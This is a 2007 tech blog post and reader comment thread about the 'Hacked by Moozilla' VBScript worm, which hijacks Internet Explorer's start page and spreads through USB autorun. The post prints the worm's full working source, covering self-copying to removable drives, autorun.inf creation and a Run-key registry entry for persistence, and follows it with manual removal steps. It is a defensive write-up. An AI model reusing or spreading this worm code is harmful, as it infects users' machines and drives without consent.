Hacked by Moozilla
Mar 20th, 2007 by Karthick
Recently, I have see many instances of this browser hijack in many machines. People are going nuts with this infection and here I am nearing the solution to wipe it off from the machines which are infected.
Browse and Explorer Hijack ?
Yes. IE gets hijacked after the infection and whenevr IE is opened up, home page gets hijacked and re-routed to http://www.lastchaos.in.th/ .
Apart from the browser hijack, it hacks the windows explorer. In a infected machine, left double click will not work to open the drives under the windows explorer. Right click and open or explore will do that. So, it hijacks the IE and also the windows explorer.
File and Location
The file name which does this hack is IISDLL.dll.vbs and its location is in c:\IISDLL.dll.vbs and C:\Windows\IISDLL.dll.vbs.
The file has read-only attribute and does not allow to make changes to it. One need to change the attibute for making changes to the file.
Mode of Infection?
Going by the script, the mode of infection is through flash or thumb drives. Be careful with yours as machines are rapidly infected with this file.
Solution?
Have tried cleaning the machines with all AV software I could think of and nothing seems to work. I am planning to write a counter script to nullify this one. Till then watch this space for a proper solution.
Where is the script?
If your machine is infected, you can locate the file and right click and edit it with a notepad. If your machine is not infected but you are curious to know what the script does, see below.
IISDLL.dll.vbs
‘My name is Sukorn test script for bootsecter
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = “[autorun]“&vbcrlf&”shellexecute=wscript.exe IISDLL.dll.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 32
set tf=fs.createtextfile(winpath & “\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & “\IISDLL.dll.vbs”)
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &”\IISDLL.dll.vbs”,2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &”\IISDLL.dll.vbs”)
tf.attributes =39
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes=39
end if
next
set rg = createobject(”WScript.Shell”)
rg.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL”,winpath&”\IISDLL.dll.vbs”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”Hacked by MOOzilla”
rg.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”,”http://www.lastchaos.in.th/”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sd = createobject(”Wscript.shell”)
sd.run winpath&”\explorer.exe /e,/select, “&Wscript.ScriptFullname
Update
What this moozilla does?
Moozilla hijack is not a malicious program to damage the machine. It is a small windows vb script to hijack the start page of your browser to some Thailand site. The autorun.inf file gets copied to the flash drive from a infected machine. When the flash drive is inserted in another machine, the autoplay feature activates the autotun.inf and copies the ISSDLL.vbs and autorun.inf files to all the drives except A:\ . May be the script writer likes floppy very much. 
Have removed the hacked by moozilla browser hijacker off my machine. 
Here are the manual removal instructions. Watch this space for an automated script to remove the hijack off the machine.
Disclaimer
The solution given here worked for me and it may or may not work for you. In no way, I am responsible if anything happens to your machine after following the steps given below. if the solution helped you, leave a comment down which will make me smile and increase a day my lifetime. You can leave a comment if it did not work, but show some courtesy. I don’t want blood oozing out of my ears after reading your comments. 
Manual Removal Instructions for Moozilla browser hijack
1. Start the Windows in Safe mode. Read Instructions on how to start the Windows in Safe mode.
2. Take out the USB storage devices if any plugged in. Any flash or thumb drives.
3. Open My Computer and look for the number of drives you have. You may have around 3 to 5 drives apart from the A:\ (if you have floppy) or an optical drive (CD or DVD drives).
4. Each drive will be marked by letters like E: ,F: etc; 
To make the computer to show hidden files and fodlers, click tools in My computer and click folder options and click view. In the series of check boxes and radio buttons, do the following three things.
a. Click Show hidden files and folders.
b. Uncheck the box Hide extensions for known file types. 
c. Uncheck the box Hide Protected Operating system files (Recommended).
5. Click Start and click Run Type C:\ and hit enter.
6. Look out for the files named autorun.inf and ISSDLL.dll.vbs. Select them one by one and hit shift+delete keys together.
Navigate to the windows folder under C:\drive and look for the same files and sgift+delete them.
7. In the same way, follow the steps for all the drives listed under MY Computer.
8. Click Start and click Run. Type regedit and click OK. This will open the registry editor.
9. Back up the registry before making any changes to it as it may cause dangerous implications to the machine. Read how to backup windows registry?
10. Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Start Page on the right hand side.
Navigate to the key HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\ and delete Window Title on the right hand side.
Navigate to the key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and delete MS32DLL on the right hand side.
11. Restart the machine and Open IE and windows explorer to see that moozilla is gone. Enjoy!
we want a simpler solution for this problem
Hello Mr.Raghavan,
I am working on the simpler solution and will post the script once it is ready. Please wait till then.
AMAZING solution for this problem…..thanks man!!!…iam free from HACKED BY MOOZILLA…
I DID THE SAME THING BUT NOTHING HAPPENED WHEN I SEARCH FOR THAT FILE IISSDLL.dll.vbs IN SEARCH I DON’T FIND THAT FILE. BUT STILL I GET HACKED BY MOOZILLA
I tried to delete that files it’s not get deleted
Thanks mate. Ur solution worked.
But in all my drives I found only autorun.inf & not ISSDLL.dll.vbs.. So I could delete only autorun.inf…
Also in my registry I found Start Page & Window Title in the location u gave & deleted them but could’nt find MS32DLL in the location u gave… So I searched for MS32DLL in my registry, found it in a different location & deleted it..
Restated my PC & now I’m free from Moozilla…
Once again thanks…
Thanks.. it worked..
Prasanna , Harish K and Saraswathy,
Happy that it worked.
Francis , Karthik Verma,
Please try it in safe mode and go through my instructions carefully. It will work. Patience pays.
What will happen if i delete the total script while i edit the script with notepad?
um….i can’t find the files, but i found the registry entries…
Is it better to just edit those entries, or just delete them?
hi there
i had this problem with my iexplorer… for long
so i switched to firefox … there i made it the default browser (and worked for few days…)
now im back in i explorer and found the problem is no more there
this is true and i dont know whether that will pop up again…
for now it is ok
but i can not open my pendrive double clicking!???
i want some suggestion on a problem free browser…. recommend please
Hi Thalai !!!!
Super solution…
Moozilla is gone…
Rombo Thanx
Neenge Nalla irupinge
Thank u
Regards,
Krish
(skpgreen25@gmail.com)
Hey, i tried the solution given, but it just returns back after a few days, now what to do?
Hi. I did all the above said procedure but when I reached the regedit part, my system says that it has been diabled by the administrator and I cannot enter the registry. I am the administrator of the machine. How do I proceed? Thanks
Yo! man…awsum trick!! awaitin 4 ur script for IISDLL.dll.vbs removal!
my system got rectified by this problem.
Abhi
What Man I Can’t remove “iisdll.dll.VBS”
Pls Tell Clear Solution
same problem but it is rhetoric. please give a permanent solution atleast for windows xp sp2. i am using windows xp 9 in 1
hurry up
i have done all thing………and then formatted now my system is ok…….but in single drive its there…one disk i am not able to open……ok where to delete the MS32DLL file please tell the path…..clearly.please……….
@ Tushar,
Thats a good question. May be you can try that.
@ balaji,
Problem free browser ? you already have one. frefox is one good browser and the latest IE 7.0 is also ok.
@ Krishna Prasad S , Pawan , Abhimanyu, Husain,
I am happy that my solution fixed the issue. Your comments encourage me to write posts like this.
@ Lakshmi, Ravikumar.S , alex , prasath,
This solution worked for me and lot of others too. So, please go through the instructions one by one and it shold work. Remember that patience is the key when supporting or troubleshooting computer problems.
@ Anant,
try it in safe mode.
how to block this from further infected?
how to block this from further infected? As i use my flash drive, it is got infected again….
i tried to shift+delete autorun.inf and ISSDLL.dll.vbs from my C and D drives like you said i should, but these files will still be in my com when i restart, and MOOzilla will still be there. how… ??
it’s ok i managed to get rid of it! thanks so much!!
Thanks Kathick,
Every Thing Fine now.
very good work.
good solution and root cause
Brilliant, Thank you.
Brillant, Thank you
thanks…
Hi,
i am unable to locate the Window Title in the regedit. could trace start page there. Hey but if I have understood right. These steps will tackle only the IE related issue. What about the “C” related issue: can’t open by double click.
Thanks,
Shree Harsha G P
HI GEE
Really!!! wonderful solution , mikka nandri & Thanks
Thanks karthi… I successfully removed MOOZILLA from my browser with ur detailed procedure… But still the autoplay option is existing, could u provide some suggestions to remove that…
Thanks!! That worked….
Sir,
i cannot see some folders ,in folder option if i click the, so hidden files it is not working how to rectify this
regards
Mahes
hi karthic thank u . it is successfully working on mypc.
Hi Karthick,
Thanks. It worked for me. I am now free from hacked by moozilla. Once again thanks. Can you help me to remove a trojan: new malware.j the exe file name is svchest.exe.
HI karthick.. nice to know that it has worked for many. Id like to know what is wrong with “viewing files that are hidden in C drive”, even after I had toggled off to view them. My quest to search ‘n destroy the .vbs worm is not working on this particular PC. The symptoms are : “Autoplay on right click” in C, D, and F drives, “Hacked by Moozilla”
“Show Hidden files not working” and probably things i might have missed. It’d be great if you can let me know how to get rid of this. Thanks…
Hi man,
I’ve faced the same problem and have recovered already. Avast! Home edition works fine to remove the virus but you need to run it through another machine and attach the infected drive. While this (and a few more) infections were active, I was totally unable to even install any anti virus on my machine. When I tried, the installation was getting closed automatically.
I’ve come to this page because one of my system running Windows 2003 Enterprise Server 64-bit edition have got infected by this script and this happened because I tried to access the hard drives of this server from infected machine using admin rights and my anti virus was running outdated virus definitions. As soon as I updated my McAfee Virus Scan 8.0i Enterprise with latest virus definitions, It identified the script and removed it. Though, I need to remove the registry entries manually.
But, unfortunately, my server is not fine. I am unable to access and see network connections. When I diagnose further, I found that many other services could not start. I am still in search for the solution.
But, after all, your description for the cause “Hacked by MOOzila” is very clear and I appreciate you contribution.
Sudesh Kantila
[Network Administrator]
SECS, SIKAR (INDIA)
Karthik
In my computer , in the folder options if set to see the hidden files it will automatically goes to the previouse position ie, even after check marking show hidden files and folders we cannot see them . And regedit, msconfig, gpedit all are disabled.
What can I do ………
Nice Site!
Hey Karthick, could you answer this please?
Whats happens when we run our computer in safe mode? does anything on our computer delets or starts behaving out of normal? and next time we turn on the computer can we run the computer in the normal mode? What is rebooting the computer?
Thank you
Best Regards~
Pintoleite
hi Karthik
thanks a ton… i have removed hacked by moozilla finaly with your help…thanks again…
it realy works
There is an other problem that comes along with this, all folder duplicates its self with another file name similar to it with an .exe extension. for example when we go into a folder named newfolder we can find another folder with the name newfolder.exe.
And also the virus has affected my W810i cell phone. Can anyone give me a solution to remove it?.
Hi thanks man i waz sufferin from this prob for long time …….got a solution..Thanks
Please give u r mail id
Hi Karthick,
Awesome Solution….Both the problems were a real pain while I tried opening all the drives on double click or using the enter button or tried opening IE 7.0…Your suggestion worked perfectly…And for those who have trouble fixing this issue…please try once again and look at the solution and trying implementing it properly. Initally I thought I had done it perfect…But alas, I ignored silly mistakes…So once again read the solution carefully. Does not matter if one of the files are missing in hidden folders like what Karthick said…implement the procedure over the rest of the files that you can locate…
thank you very much……..
i solved my problem”cannao find script c:\IIDLL.dll.vbs”
thanku very much
u are great
i had done as u said and i am amazed to see that the error has gone
once again i appreciate u
Karthick,
i am surprised that your solution worked with so many and no one came up with a problem like mine. Would you have some advise????
The folder options doesnt show up on the Tools menu, the*. vbs files dont appear anywhere and the command prompts/ regedit aren’t working. i formatted and reinstalled the OS, and the folder option came back on. But the first time I used IE, the hacked… by mozilla … lastchaos, came back and the folder option has disappeared again.
Worked very well thanks for the instructions
If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.
@karthick, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
If you don’t remove the autorun.inf from the USB, it’ll come back the moment you put it in. Make sure you delete *all* copies of autorun.inf from your computer, USB drives, MP3 players, cameras, etc first, BEFORE running the regedit section.
@kiron, you reformatted your computer and that fixed it up, but then put your USB drive in, and reinstalled the virus.
Oh, and it’s an awsome code for what it does…
*note*, you don’t need to remove the .vbs if you can’t, as long as the autorun is gone.
Hi friends,
Keep right click always to open flash drives, it will prevent to execute the auto play option and free from IISDLL virus…..
Thanks. It the process of doing this much easier than what it appears to be. It is absolutely safe and hasslefree and Hacked by MOOzilla goes for ever.
Simply superb solution.
Hi Karthick
I tried with Ur solution which i performed manually but it is still that problem is coming up hacked by MOozilla, what i need to do please reply immediately.
bye
Sunil
Thanks a ton man… u rock…
I cant go after your solution aftr the Point no:5.can you provide a flow chart with easy accesss.it will be very helpful.it’s in your hands to make my PC free from moozilla.
Karthick,
i cant find the file which is(autorun.inf and ISSDLL.dll.vbs.)
where to find this
Hey Brother
Thanks a lot for the solution provided. It did the miracle
thanks a lot karthick! i was struggling to get rid of this moozilla and finally i got the solution from ur site. it was really very helpful. thank u.
super super super tq tq tq grt grt grt
sir
u r ginius i respect u do make a help everytime
u r really good plz send any thing intrested to my email
again u r good
Hi Karthik,
How are you i am also having the same problem but i can open the drives with left click.but in IE it shows Hacked by Moozilla.
Wat is the reason behind.Pls give a solution i got my PC just one month ago.It really terribles me
Thanks a lot…
But can u tell me how to remove the “Autoplay” from the right-click menu for drives……
but still im no longer getting redirected.should i do any thing abt it?if so what?
Good work.
Thanks a Ton.
Worked for me
thanks,
it solved my problem
hi
thanks
worked for me
Hi Karthick,
Your solution worked…thanks
Yousuff
THNKS IT WORKED….U CAN USE UNLOCKER SOFTWARE IF ITS NOT GETTING DELETED….
mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
m
Thanks a lot, it really works
see for how many days
COuld you please let me know the source from where we get this virus so that we may take care of the same.